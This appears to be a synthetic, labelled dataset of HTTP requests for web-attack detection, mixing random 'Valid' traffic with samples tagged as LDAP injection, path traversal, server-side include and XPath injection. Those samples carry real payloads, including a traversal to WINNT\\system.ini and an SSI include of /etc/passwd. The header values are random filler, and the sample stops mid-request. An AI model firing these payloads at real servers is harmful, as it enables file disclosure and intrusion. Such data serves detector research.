Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 169.141.62.144
X-Serial-Number: 850343
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41928
Start - Id: 17621
class: Valid
GET /2wePrmD/_xYu8/aew8rcylhsieEncid/TIosdwtohtoejnt/yndml5bua/u1/eeIttpttaayqeireu.cfm?hohi=i53f+&s2=axGwAOSh&idnndepa=a5VbR9ANw0&safaiee=hd&oae1tahresFhaea=taarenereobemedd&hneem=nlN&deei=549721759&enHQ@=AamI4Hesbsm5&stoeqte5=og&tuebre4h=hf5sooghaip7e&keLtrsn4oi6urat=wdconnectgfzkodl&toeasnjt=i4ef%5Dey HTTP/1.0
Host: 109.242.103.31:80
Connection: idamag
Accept: audio/basic;q=0.3
Accept-Charset: iso-8859-1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4032
Client-ip: 198.210.179.113
Cookie: esnepsei00d2a=o=oej;rcphOb7aenuhr0D=loehtpassashrqst>t;r7tniAgosy9d=pAa3oEbe;Cthrjhxoitdx=tU0FG
Cookie2: $Version="35"
Date: Fri, 14 May 04 14:03:21 CET
ETag: W/"oWt@jwocm2BL8j1S4f"
Expect: 100-continue
From: croeol2e@tiEhh0b.de
If-Modified-Since: Sun, 16 Aug 09 09:50:43 CET
If-Unmodified-Since: Thu, 14 Jul 05 12:57:26 CET
If-Match: "vEDnAcbPGtc3Bdf"
If-None-Match: *
If-Range: *
Max-Forwards: 6064
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/ote8cdid.gif
Authorization: NTLM R2phWXhyRnROdHQ2ZW5zaGRvb2NlZWFlcmUzY3pTYWFSNDJhdGRlYWF1b29pcnQ=
Range: -948
Referer: http://Ss8e.fr/tli5eu3e/alIIn/ddriaha/mnceA.wmn
TE: deflate,chunked
Trailer: TE
User-Agent: Mozilla/3.7 (Windows; U; Windows NT 9.1; ts-eo; rv:8.4.3) Gecko/19717647
UA-CPU: MIPS
UA-Disp: 611,8955,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 519x8664
Via: 8.4 www.Haftne.jpeg, 6.1 139.153.136.199, HTTP/9.7 www.OsoeoEei.js
Transfer-Encoding: gzip
Upgrade: H4s/6.5, syax/8.8
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 68.35.229.1
X-Serial-Number: 9137619285
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17621
Start - Id: 11283
class: Valid
GET /y1eayaniTosre8d0il/ps.TPINgws7qL/qPm1TD8hnJxoshO/stsEos3tntI/em_fSShVe/iiteipiRncoutene7gR/Tnptm2yhs9it/udcichpn9eishehr/idr5tamitqs/oglike.css? HTTP/1.1
Host: 159.204.16.215
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-roman;q=0.8
Accept-Encoding: 
Accept-Language: rr-sds, smlmpde-t;q=0.9, set-grar
Cache-Control: no-cache
Client-ip: 43.28.8.140
Cookie: aemapi=tinm;dwre=hsAob-n)v9
Cookie2: $Version="30"
Date: Sun, 02 Jan 05 12:43:54 CET
ETag: W/"i3D@tv.QMOZhRlbwwT"
Expect: ano2mdc
From: 7urSh@tin1aU.biz
If-Modified-Since: Sat, 05 Dec 09 14:10:12 GMT
If-Unmodified-Since: Sun, 01 Jun 08 20:42:55 GMT
If-Match: "@4mSvjT7Y4m1QcNi"
If-None-Match: *
If-Range: *
Max-Forwards: 01
MIME-Version: 8.1
Pragma: rhRlr=ep
Proxy-Authorization: Digest nc=3c06C92E
Authorization: Digest uri=http://77waO.be/ntlia0n/pwn3dh.dll
Range: -5,-544924
Referer: http://o69ha.cz/phaR2gqh/ti7t/geaper.jsp
TE: gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/5.9 (X11; U; Linux i386 5.9; Mi-ns; rv:7.9.4) Gecko/81954039
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4159x0330
Via: 7.4 131.28.96.229
Transfer-Encoding: deflate
Upgrade: Iinf/7.1, oavrcs/0.2, aMti/2.8, uud/0.6, sprmls/3.8
Warning: 802 www.wgr3.htm "hj5a7aEzetiifaepobs" "Mon, 21 Jan 08 07:41:19 UTC"
X-Forwarded-For: 169.229.102.168
X-Serial-Number: 7492268797432274
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11283
Start - Id: 38242
class: LdapInjection
GET /zbaenmndshaddnc/t3iarnnid/eY3it5w7R/etro/gCah4-PK-o1hZSg.html?Eh=tp9&ditssmahoawtHnt=d.gx&av=dsix&InrEn=iscriptw%28%2Fwz%5Dt0dtreht&ttootepto=hd%29%28%26%28objectClass+++%3DR2a*%29&msselnmat=gy4cI1Tkw2roughg HTTP/1.1
Host: www.oUib3yc.biz:9
Connection: close
Accept: image/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 25.111.195.232
Cookie: feryeLiaten=rD-a;eaw=tz5b2;p0b3JoUWIYLA=y8xy2;YFiW1icopy.Vt=fdSiafifltrc;s7Rt=o3;ethseKiiSn=nl-R7iT
Cookie2: $Version="79"
Date: Thu, 16 Sep 04 15:02:28 CET
ETag: "2UE0tTs01o-b81."
Expect: lereii
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Sat, 01 May 10 19:00:23 CET
If-Unmodified-Since: Tue, 21 Feb 06 20:08:52 UTC
If-Match: ".RaCIKNYPj.gZHc3"
If-None-Match: *
If-Range: *
Max-Forwards: 2332
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: wtahel auxc9d=5nTomi
Range: -88,49314-030507
Referer: /cshqto0i/zcthsp/cliad/2u22x.sh
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.7 (Machintosh; U; PPC 5.0; P6-ie; rv:0.2.7) Gecko/08614052
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 265x803
Via: 9.8 97.58.62.255, FTP/2.9 34.237.185.182
Transfer-Encoding: gzip
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38242
Start - Id: 19164
class: Valid
GET /lAMJLYruI_eqa/cqeehdEp0tr/amt2mhnysxa19epeARif/sd8SfZe.MKtZ_-yG4/xaSsdctShuSttth/tO51.dPtK9AZ/eddo72A74mWoO4cd02rb.php3? HTTP/1.0
Host: www.altdo.de
Connection: Rpopd
Accept: video/*;q=0.6, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aoa-y;q=0.3
Cache-Control: only-if-cached
Client-ip: 83.11.35.255
Cookie: Sd6ah6aparh9oO=87387285
Cookie2: $Version="331"
Date: Mon, 19 Jun 06 02:03:02 GMT
ETag: "JKdo902.JrP1q_5Ym8X3"
Expect: 100-continue
From: sls8@HHNtidid7.ch
If-Modified-Since: Sun, 11 Jul 04 01:56:18 UTC
If-Unmodified-Since: Fri, 07 Jan 05 17:45:17 GMT
If-Match: "q10zJx9R3z0U1afkyJLm"
If-None-Match: *
If-Range: Fri, 20 Feb 04 18:54:33 UTC
Max-Forwards: 36
MIME-Version: 2.0
Pragma: lc=Ho
Proxy-Authorization: seed uhnsrr=8hieutI
Authorization: NTLM ZXRlZWllYXZkcnR5c3plc2RiYXRhdnRvMWlpOXNkMG5UaXJlOGhi
Range: -26751,992963-79665,-06526
Referer: http://din9.fr/jrienne/NgryT/NekeOl/e8Pr7t/Est3.conf
TE: chunked;q=0.8,trailers
Trailer: TE
User-Agent: rfEasdah7
UA-CPU: MIPS
UA-Disp: 070,359,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 923x3383
Via: HTTP/8.8 www.heee.shtml, FTP/9.9 www.slns.tiff
Transfer-Encoding: gzip
Upgrade: rtecO/7.7, YhdLe/3.7, hose/2.0, 6szce/9.1, ide47/9.2
Warning: 693 239.139.121.216 "lqenTohNatwk" 
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 0241089551352273
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19164
Start - Id: 11758
class: Valid
GET /tadesaoiTohomnohniy/ad1fh/tgrJ1Agb1t1xM8Z/ofz9.ZsaNBH/wT7bzFo7Am/fCTgSFy.i0B/esainttdaoaiuwaO/r436Q97iMf6U2nEMjI/cAlinrn/egfsAJC0/GPB/resreiem7ejsd.jpeg?iigHn=634059006&ihieUeeiupatas=ajlos&sa1esti=r8&settyar=tshf&uGpotyaRnfasw=tSnEak-H&htnwj=acbP4&WSyhrJSALb=%3CNmr+slogS%3Deen%7Ei&nauht=qo33 HTTP/1.1
Host: www.Emlaaiii.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 104.75.164.98
Cookie: rs3te2n=afONhmFz;eK8GSQ=s-dua
Cookie2: $Version="49"
Date: Wed, 08 Oct 08 01:21:41 UTC
ETag: "AAmFV1z1hboDKoW92Jd"
Expect: h5a2c=ithdEeE;is4r=hnvo3Fg
From: ccsp3@ElRrgnej.biz
If-Modified-Since: Wed, 04 Mar 09 20:44:11 CET
If-Unmodified-Since: Thu, 24 Aug 06 18:41:13 UTC
If-Match: "Bkj1GIFxcFKtcd@Ji"
If-None-Match: "yiTCmt@5puNxgoMs2"
If-Range: "uIjgaRTmqxw9tEae49O"
Max-Forwards: 4523
MIME-Version: 2.8
Pragma: o=asdam
Proxy-Authorization: yTdcy mmao=aeVHnac
Authorization: NTLM aHN0dWVpYXJuZW5paTV4aG5vcml0MzJvaG9pbmVnc2FyaG9ub01lUmg=
Range: 826738-,52-
Referer: http://www.rnna.gov/eranwp/mt3i/cb16w/uznen.php4
TE: trailers
Trailer: Host
User-Agent: boRsegeogeNc
UA-CPU: x86
UA-Disp: 372,7869,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 810x3178
Via: HTTP/2.3 90.146.211.217, 2.8 www.e7td.tiff, 7.7 www.nttoj3ks.jpeg
Transfer-Encoding: identity
Upgrade: CeaT/1.3, qaai/6.4, iJd4/5.3
Warning: 669 www.rwxis.jpg:6311 "6cpttbsraneoe" 
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11758
Start - Id: 23293
class: Valid
GET /etoNumOennOet/0eindaazT6sitn/tQ_jNb2QH.htm?tWndubhi=rnlciubeiis&e2eger6=839632&bikeoeyuw1ir=rlesLypdnnodein%3B+etio%5DT&uAyUt7el3=dni0yu&idj5bc4tnehqtq=n69fpX&Q-ZDh6=70679349&q0pnsNn7qim=wns&ivrmHonowozr=gtaset HTTP/1.0
Host: www.mnhw.net:80
Connection: close
Accept: audio/basic, application/*;q=0.5
Accept-Charset: iso-8859-9, x-mac-chinesesimp;q=0.2, x-mac-icelandic
Accept-Encoding: compress, deflate
Accept-Language: 3g-egtu;q=0.0
Cache-Control: only-if-cached
Client-ip: 168.203.205.51
Cookie: DexecgVitormRG4body=iniee2oms;tie2essr=adelete1;wiRarfonu=fMG;eozohtist=7;5c78p5Kfrm=t0arra&evocsiigri'a;ncheeabLn4Ots=709504
Cookie2: $Version="39"
Date: Sun, 03 Dec 06 06:46:06 CET
ETag: W/"NUZkkUOZ6GCqV.vSRcdw"
Expect: 100-continue
From: zttea@aht7uetl.it
If-Modified-Since: Thu, 02 Feb 06 08:56:00 UTC
If-Unmodified-Since: Sun, 03 Apr 05 07:54:59 CET
If-Match: "biXr5Om.yX@wc37lz"
If-None-Match: "lxxLMkvXH_n.KA0L26_P"
If-Range: "XxonQOz3@s_XWcPfRz"
Max-Forwards: 2040
MIME-Version: 7.6
Pragma: qrTd=apAdlaa
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: NTLM bGFvc25SbDhwYXljY252dDVXT2V0bGluM3NzYnNucmhuZW1zZQ==
Range: -8,52-66986
Referer: /fcwlF7y/odubr/ewaSfwa/Rihwi.php4
TE: deflate;q=0.6
Trailer: Accept
User-Agent: gmtrp1eN/6.3
UA-CPU: MIPS
UA-Disp: 139,6869,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 626x088
Via: 5.6 92.3.146.193, FTP/9.4 173.219.106.79:288
Transfer-Encoding: gzip
Upgrade: etro5e/7.7, dH1i/3.8, rit/1.6
Warning: 500 49.153.182.242 "erstott" 
X-Forwarded-For: 232.26.81.244
X-Serial-Number: 1450242
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23293
Start - Id: 46005
class: PathTransversal
POST /4m/txes/gsutolrcxou7iy/hteltCatwoma4to/t_PNo.cgi? HTTP/1.0
Content-Length: 34
Content-Language: y,9t,ianrh5us
Content-Encoding: identity
Content-Location: http://www.yueo.org/aWnmsm7.exe
Content-MD5: aWhhczM2dnluaW91cGsxZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Jul 05 02:14:48 GMT
Last-Modified: Wed, 17 Jan 07 12:08:19 UTC
Host: www.csnpt.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: Leodxr-ieq5ell
Cache-Control: min-fresh=52464
Client-ip: 59.86.168.214
Cookie: wtvlrj5O9iugp=..\..\..\..\..\..\WINNT\system.ini
Cookie2: $Version="397"
Date: Fri, 11 Dec 09 17:15:01 UTC
ETag: W/"Lio@mDwzEYeOCCtfGS"
Expect: 2gitna=bepaupjr
From: tKcUisc@antaldEso0.cz
If-Modified-Since: Tue, 29 Aug 06 03:19:17 UTC
If-Unmodified-Since: Sun, 11 Apr 10 12:37:27 GMT
If-Match: "Mvm95AZ.dtvSHZHs88e"
If-None-Match: *
If-Range: Sun, 21 Mar 04 05:33:08 UTC
Max-Forwards: 960
MIME-Version: 3.3
Pragma: loa=gkendt
Proxy-Authorization: Basic ZGRsTnE6Z3V0cw==
Authorization: Digest response="c1d3bE593b9837E9F7afEba483DDbABC"
Range: -731527,95-0699
Referer: /eksh0U/5otaiei/ctsssjeh/erJnczNl/noddrld.jpeg
Trailer: TE
User-Agent: anas/5.0
UA-CPU: PowerPC
UA-Disp: 8499,1541,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8665x2927
Via: est/0.6 92.176.54.14, 3.0 127.1.31.60
Transfer-Encoding: identity
Upgrade: acer/6.7
Warning: 195 www.n1aptah4.html:32008 "7ardemoonbte" 
X-Serial-Number: 98495293
----: -----------------------------------

lNllnNesjhi=a4UOyb&h3eEeuTte=05287

End - Id: 46005
Start - Id: 39504
class: SSI
GET /aoPLT3-RfVwSz/mRzj-@z/WDiV.DBstyleEKGetc/sOmZEBA5EThCfH.exe?iIaOEresq=9268264&srz5eayo=pevHhtCvO&fuoaiweesu0xO=NlyenvsNirenda&.kTz=edDi&MMhtacces@lVL2T=jqh3ztg5fu&eS=nDNHEgl0&nwha=83599&A0A6@ZP.BXW=aaonEywhsEawze&otioesilezrc=o6l&eeo3eiutut9O=dd%27urtser&Chwut7mIt=+S&gaolcoiLp0os=lhaz3eUa%28&oVgchild_uFZ-=r3ieaaedrDr3mxaR&ya=0 HTTP/1.1
Host: www.ohyahrbn.fr:62415
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.0, x-mac-icelandic;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: alae=uo2ex
Client-ip: 17.157.96.204
Cookie: q0etalkr=ga@A7GK;n4fe8ya=i;nbn2jnadwj4;ose=omArqjfje3;upTrqIs=94548411;eenucs0tizT=sJfCu@SQtn
Cookie2: $Version="1"
Date: Mon, 02 Feb 09 18:43:20 CET
ETag: "X0Rl-@AjgqcgaK1"
Expect: 100-continue
From: el2u@0la399.com
If-Modified-Since: Thu, 15 Apr 10 14:55:20 CET
If-Unmodified-Since: Mon, 19 Apr 10 03:35:53 CET
If-Match: "VOVaXdoBX.Y8xWyV67ak"
If-None-Match: *
If-Range: *
Max-Forwards: 947
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: 6eesqI biis=qhv8oi65
Authorization: NTLM OElyZGhuTmFlck5laXlpNmlmMmt0ZTZtYUViZHhlQ3RpcERhYQ==
Referer: /rlyf/akmhdaa/n6innUL.swf
TE: gzip;q=0.1
Trailer: Expect
User-Agent: <!--    #include  virtual="/etc/passwd"   -->
UA-CPU: Sparc
UA-OS: Linux
UA-Color: color16
UA-Pixels: 116x5142
Via: teetd/9.5 151.201.24.55
Transfer-Encoding: gzip
Warning: 903 11.205.255.14:699 "aie8fmms" "Sun, 25 Oct 09 02:11:26 CET"
X-Forwarded-For: 212.30.157.133
X-Serial-Number: 81323854011
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39504
Start - Id: 34647
class: Valid
POST /lEFmy2UtnX8JjWM/hFIM@z.Qb9PzoMY/oX29dx46r/ixHCqb5FQa.sh? HTTP/1.0
Content-Length: 317
Content-Language: lAii,9earudt,s18h
Content-Encoding: compress
Content-Location: /plojet/eeSrEz/eaIamTri/jodmGp/bnq924.pdf
Content-MD5: YWlkaUloaDhjbHV0QXJtYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 May 04 17:04:47 CET
Last-Modified: Tue, 14 Sep 04 03:36:45 CET
Host: www.yeaN7mal.com
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-ce, windows-874;q=0.2, x-mac-hebrew, x-mac-korean;q=0.2
Accept-Encoding: 
Accept-Language: ZfeoaDnl-e6c;q=0.8, eo-necnrcns;q=0.8, egdnrI-g;q=0.5, e-tpfcc
Cache-Control: no-transform
Client-ip: 67.93.72.22
Cookie: tIemppcdhs4=systemk;nyasooE2rp=trWe.bkL;6f_2.JNGg=aVs@UA;7fJmP0=aceoB;6s=::oKt
Cookie2: $Version="9"
Date: Sun, 13 Apr 08 17:39:33 UTC
ETag: "qe_7hAVu7Wn2tFiI"
Expect: 100-continue
From: 58h33lcc@coecl5g.org
If-Modified-Since: Sat, 22 Jul 06 13:06:02 CET
If-Unmodified-Since: Tue, 19 Sep 06 01:44:47 GMT
If-Match: *
If-None-Match: "jVfLu.Ur2Rj8GlJ"
If-Range: "1NNvjpxSHlqz6V0gVE@P"
Max-Forwards: 08
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZWFicElhTDo3aW9ubQ==
Authorization: Digest username="eemhmowa"
Range: -92449,63-97080,49-2
Referer: /towesga/r6ifbqf/ulSr/ndldtA.png
TE: deflate,chunked,trailers
Trailer: Connection
User-Agent: Mozilla/8.2 (compatible; MSIE 4.1; Windows NT; swdmt; tftisi)
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3397x406
Via: 9.6 www.htr2nnrp.css
Transfer-Encoding: gzip
Upgrade: 0lmc/3.2
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 09613
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C7G1boot.iniqr@idtmpJD=%2Feform%40ay%40m&seHenpaegftz=+dtereselectgt&NgtadTkfig2ah=10&eoiwqnfppUNbznb=bjaOMEVqoy&er0mShatirbm=83&locationKRf%u=964146&AigeDPR_8=N%40l+%24s%7C8a4D-&GkCmApasswdGEH=e_Mn2mzqbMR&F37Ih5Kform=irndesadakAt&oA9ee3=untibof&teiwsrwdup=01&in20=uk&mhleeau=nnliIeen&tQPetnr=1191&aqbcuxorbhtEOl=Gott

End - Id: 34647
Start - Id: 4888
class: Valid
POST /vNlWt-Y_C.i/rt/kdmp6ekoah8heac1r/divZbetweenxMftav1wzwp-/3qkAu_/nbiCu.XdK1if9ag4/QbJE/nlnnfnnst98/tmb87tiqjwpoe/fUch7iIc2hbAH/rzMN/replaceIoGd3a_OLE.htm? HTTP/1.1
Content-Length: 13
Content-Language: rkee
Content-Encoding: deflate
Content-Location: /aaN3N5.mdb
Content-MD5: dG40N25hc3RlenEzdHNiaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Oct 07 21:13:25 CET
Last-Modified: Thu, 07 Jul 05 01:00:07 CET
Host: 187.50.111.118
Connection: nTalr
Accept: audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, deflate;q=0.1, gzip
Accept-Language: *;q=0.9
Cache-Control: min-fresh=6815
Client-ip: 29.17.35.192
Cookie: Tteoh4lnu4=06548741;nshaeaIeEoet9nh=noCearto;rn=7654257
Cookie2: $Version="471"
Date: Tue, 06 Jan 09 17:41:42 GMT
ETag: W/"M7ZgvO50v8rk7fRj374"
Expect: 100-continue
From: itds3@bta1toaaio.be
If-Modified-Since: Sun, 24 Jun 07 10:55:44 GMT
If-Unmodified-Since: Wed, 20 Jul 05 05:54:34 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Mar 04 09:34:18 GMT
Max-Forwards: 208
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM aHJjZHNpcmQyeWVFbHJ0b2VkcmhIaW9Wb2VtcnRza3R0dGdjc290eGFu
Authorization: NTLM TmZpaGJzWXduZXlvaXJ3ZXJhdGVob1hpaGUydG40aW5uZWxlV2hj
Range: 700323-3,56039-78431,91-43
Referer: http://www.obu2rdal.cz/mgsrLh3a/aEer3.cfm
TE: trailers
Trailer: Referer
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 1.7; sd-u4; rv:9.4.7) Gecko/11641486
UA-CPU: Sparc
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1385x252
Via: 3ea/1.4 www.9sencsu.jpeg, 3.7 www.rosensm.htm
Transfer-Encoding: deflate
Upgrade: wsry/3.9, n3Lf/9.4, otoco/2.2
Warning: 370 81.227.211.19:2 "6ei3tramotteeod" "Fri, 19 Jan 07 24:17:39 CET"
X-Forwarded-For: 166.37.58.71
X-Serial-Number: 8226641933053
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

utu=cmho9l352

End - Id: 4888
Start - Id: 37791
class: LdapInjection
GET /e1g/aFT4-8r4DAA5__.msf?otjemcuqtSmeelh=7149793481&tlin=49%29%28%26%28objectClass%3Dcuaa%29%28%7C%28sn++++%3D++++dqas%29%28cn%3D4+++++J*%29%29&safdf=361560&rey9tsutt=ntene4rti+fimiz HTTP/1.1
Host: www.lnh6.it:4827
Connection: ersaoi
Accept: text/plain;q=0.3, audio/basic, text/*;q=0.3
Accept-Charset: x-mac-roman;q=0.0, x-mac-greek;q=0.8, windows-1251, cp-932;q=0.9, iso-8859-1;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale=37
Client-ip: 3.185.76.253
Cookie: jekqf-cIt2VQ=a$s;tRl=ny7Nd
Cookie2: $Version="216"
Date: Mon, 03 May 10 24:53:12 UTC
ETag: W/"hT5JfGxU2GgtrH_ku4"
Expect: Re15=eal3air
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Thu, 23 Aug 07 12:33:34 GMT
If-Unmodified-Since: Sat, 03 Feb 07 18:05:31 UTC
If-Match: "f3x@0zpY1dEO4wSNMEhf"
If-None-Match: "xP.2rvy@Kyq-1nFiQacF"
If-Range: *
Max-Forwards: 967
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 5rOgw olket=bU2elthe
Authorization: Basic TXZhbjpIZVlpYWVs
Range: 985797-045,63371-
Referer: /wumpns3/seaa/Ha6os3/pirihry/recareh.sh
TE: trailers
Trailer: If-Range
User-Agent: mSMGwh http://www.stonio.cz
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 807x162
Via: 9.5 12.189.233.108:313
Transfer-Encoding: identity
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 313321
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37791
Start - Id: 35744
class: XPathInjection
GET /tE2G1@p2FB7VLqzti7p6/erAnhS/sApas/eyHOS91C8jIq6/Fbetweenl3bMbU/tFU@uIn-F8pLJ/aphazh5v.jpeg?ocn0=sand%7Co&zeeee7au=t%40zk5v&pH4W=i&g4csrjnei3eep=tTueer0sms&gftnn3asMyiSob=drrn5ee&ajtbtppeiaeTybt=ust16%27%5D++++%7C+++++P+%7C+%2F%2Fuser%5B+name%2Ftext%28+%29%3D++++%27eeofc&iiframe9E2i=u%3Edywpsastrizcnf HTTP/1.1
Host: www.Wswo2.ch
Connection: close
Accept: audio/*
Accept-Charset: windows-874;q=0.7, windows-1253;q=0.6
Accept-Encoding: identity, identity, deflate
Accept-Language: *
Cache-Control: min-fresh=50
Client-ip: 174.178.95.52
Cookie: saedRr2a=076757287;n7tatbycIetninr=9135610851;YOi79YWfkxnull=mpnnaobomochaetgroup bye31
Cookie2: $Version="4"
Date: Mon, 05 Dec 05 02:13:58 CET
ETag: "UQRCXM-rpuSyTChl2N"
Expect: 100-continue
From: T5icshho@0Oledom8.gov
If-Modified-Since: Sun, 21 May 06 24:36:03 GMT
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: "gAzTgAbOGl8BwEygsuuQ"
If-None-Match: *
If-Range: Thu, 15 Apr 10 10:13:58 UTC
Max-Forwards: 413
MIME-Version: 5.0
Pragma: eild=oOcba
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: Digest nonce
Range: 820401-
Referer: /revTT/83rTre.js
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.1 (X11; U; Linux i586 4.2; gt-oe; rv:8.0.8) Gecko/77089876
UA-CPU: x86
UA-Disp: 233,859,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: p6rrya/2.8 39.65.133.242
Transfer-Encoding: cdai
Upgrade: Toa/4.1
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 4305096438524037
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35744
Start - Id: 30957
class: Valid
GET /a-e.kpOZzGgv2sCQX/Wad/iI5QFdPYKbS/a29.aspx? HTTP/1.1
Host: 214.99.197.253
Connection: EbtltBie
Accept: */*
Accept-Charset: euc-jp;q=0.7, iso-2022-jp;q=0.2
Accept-Encoding: *
Accept-Language: eyta-blterssh;q=0.4
Cache-Control: min-fresh=116
Client-ip: 85.194.154.132
Cookie: ajNbGX=a9;yhrhoufi=samohoaa4eiframeTh3;4weJtdEtuqq=2276638;toa5lYmm=1354106;ejyejclRokihis=745
Cookie2: $Version="654"
Date: Mon, 22 Nov 04 01:06:19 GMT
ETag: "5e_Nr_S.RrEhzGj7@IRz"
Expect: Whtamtlo=e0nh;iikcteo
From: 2teoy3o@9tooecavin.be
If-Modified-Since: Fri, 14 Oct 05 05:10:07 GMT
If-Unmodified-Since: Tue, 25 May 04 03:28:11 CET
If-Match: "nQ2UmUoXcRBXzyDNe"
If-None-Match: *
If-Range: Thu, 25 May 06 22:46:18 GMT
Max-Forwards: 0990
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM aWhhb25kZWVUYXNjaGlmaHRtUzhEdHVycjJzdG5vcHh3bmVob2hhOW1ScmRv
Authorization: NTLM ZWRucnZhZW1zYm44c3RwZmFkRU9zZVNyeWRudGlpbXR0aGVBZQ==
Range: -73
Referer: http://www.vNiexde.net/Ibyonf/eteym/cIai9o7.html
TE: deflate;q=0.8,trailers
Trailer: Range
User-Agent: heaag5t (hK3yY7; rfVnPhutA0)
UA-CPU: PowerPC
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 206x306
Via: 6.3 72.175.164.104:6, 9.4 www.manrjJ.shtml
Transfer-Encoding: po7a
Upgrade: ehia/0.0, eN7b/7.6
Warning: 912 www.svdVuoCG.jpg "fhodof" "Sat, 09 May 09 20:18:55 CET"
X-Forwarded-For: 19.38.156.93
X-Serial-Number: 17732280940641123
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30957
Start - Id: 48569
class: XPathInjection
PUT /r0rr/nW3Qc.css? HTTP/1.1
Content-Length: 373
Content-Language: lrotene
Content-Encoding: compress
Content-Location: http://t8baAn.fr/92ivre/yD11Enar/heon/lszfu3.msf
Content-MD5: Y3RlaEhlbjFoZWRvbmE1dA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 May 08 19:49:44 GMT
Last-Modified: Thu, 09 Dec 04 16:06:18 CET
Host: 9.165.146.199:1
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.1, compress, deflate, gzip;q=0.6
Accept-Language: l-sx, ss-A;q=0.2, ileelY-40tj
Cache-Control: only-if-cached
Client-ip: 5.57.77.191
